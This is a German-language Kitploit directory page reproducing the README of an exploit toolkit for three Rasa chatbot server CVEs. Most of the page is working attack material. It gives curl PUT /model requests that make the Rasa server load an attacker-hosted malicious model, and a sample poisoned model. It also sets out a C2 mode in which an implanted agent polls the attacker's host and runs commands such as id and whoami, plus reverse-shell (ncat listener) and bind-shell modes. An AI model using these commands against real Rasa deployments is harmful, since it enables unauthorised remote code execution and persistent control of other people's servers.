Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
Tools/GitHubGitHub/lierbushiwo/rasa-cve-exp
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPost-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

Einfach direkt ausführen

root@kitploit:~
python server-1.py

image-20260604134536291

Beliebiger Datei-Upload

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

Effekt wie folgt:

image-20260604135232815

CVE-2021-41127

  • server-1.py

Standard-Modellname: evil_import_model.tar.gz

Beispiel für ein bösartiges Modell:

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

Setze bösartige Dialogregel

Eingabe greet → Rückgabe PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

Effekt wie folgt:

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py modifiziert die angegebenen Daten im Archiv

Direkte Ausführung: Liest standardmäßig das Modell aus /model, modifiziert und speichert es als evil_import_model.tar.gz im aktuellen Verzeichnis

image-20260604143558105

Angabe der Reverse-IP

Standard-Modellname: evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

Die Daten nacheinander senden

Weitere Exploit-Methoden

Im realen Szenario unterschiedlich

  • server-2.py

Drei Modi


C2-Modus (HTTP Polling, empfohlen)

root@kitploit:~
Angreifer-Maschine                 Rasa-Container (Ziel)
  │                                    │
  ├─ Starte server-2.py ──────────────┤
  ├─ PUT /model ──→ Lade pwnmod.py nach /app/
  ├─ PUT /model ──→ Lade bösartiges Modell → import pwnmod → Agent startet
  │                                    │
  │  ← GET /poll?agent=xxx ───────────┤  Polling alle 3s
  ├─ /enqueue?cmd=id ─────────────────┤
  │  ← GET /poll ─────────────────────┤  Befehl erhalten
  │  ← POST /result ──────────────────┤  Ergebnis zurückgesendet
  ├─ /last?agent=xxx ──→ Ergebnis lesen
root@kitploit:~
# Angreifer startet
python server-2.py --mode c2 --c2-base-url http://<Angreifer-IP>:8000 --port 8000

# Exploit auslösen (zwei Schritte)
curl -X PUT http://<Rasa-Adresse>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<Angreifer-IP>:8000/write-module"}}'

curl -X PUT http://<Rasa-Adresse>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<Angreifer-IP>:8000/model"}}'

# Befehl senden
curl "http://<Angreifer-IP>:8000/enqueue?cmd=id"

# Nach 8 Sekunden Ergebnis lesen (Agent pollt alle 3s + Ausführungszeit)
curl "http://<Angreifer-IP>:8000/last?agent=<Hostname>"

# Ohne Angabe von Agent (Wildcard)
curl "http://<Angreifer-IP>:8000/enqueue?cmd=whoami"
curl "http://<Angreifer-IP>:8000/last"

Reverse-Modus (Reverse Shell)

root@kitploit:~
# 1) Angreifer startet Listener
ncat -lvnp 4444

# 2) Angreifer startet server-2.py
python server-2.py --mode reverse --reverse-host <Angreifer-IP> --reverse-port 4444 --port 8000

# 3) Exploit auslösen
curl -X PUT http://<Rasa-Adresse>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<Angreifer-IP>:8000/write-module"}}'

curl -X PUT http://<Rasa-Adresse>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<Angreifer-IP>:8000/model"}}'

# 4) nc empfängt $ Prompt → direkte Interaktion

Bind-Modus (Forward Shell, weniger gebräuchlich)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# Agent horcht im Zielcontainer auf 0.0.0.0:4444
# ncat <Ziel-IP> 4444 zum Verbinden

Port-/Adressbeschreibung

ParameterBedeutung
Tool herunterladen
--port 8000Eigener Listen-Port von server-2.py
--c2-base-urlVollständige Base-URL für das Polling des Agenten im C2-Modus (muss vom Container erreichbar sein)
--reverse-hostZiel-IP für die Reverse Shell
--reverse-portZiel-Port für die Reverse Shell